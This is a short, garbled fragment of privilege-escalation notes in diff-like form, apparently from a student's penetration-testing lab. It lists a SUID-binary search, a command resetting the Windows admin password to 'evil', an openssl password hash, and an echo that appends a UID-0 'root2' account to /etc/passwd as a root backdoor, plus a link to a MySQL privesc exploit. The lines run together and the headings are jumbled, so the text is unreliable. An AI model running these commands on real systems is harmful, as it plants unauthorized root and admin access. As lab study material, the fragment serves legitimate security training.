Receiver

 student@debian:~$ /sbin/modinfo libata

-student@debian:~$ find / -perm -u=s -type f 2>/dev/null
+student@debian:~$ find / -perm -u=s -type f 2>/dev/nullChange password

-C:\Windows\system32> net user admin evil
+C:\Windows\system32> net user admin evilstudent@debian:~$ openssl passwd evil

 AK24fcSx2Il3I

-student@debian:~$ echo "root2:AK24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwd
+student@debian:~$ echo "root2:AK24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwdMySQL

 raptor exploit for privesc https://www.exploit-db.com/exploits/1518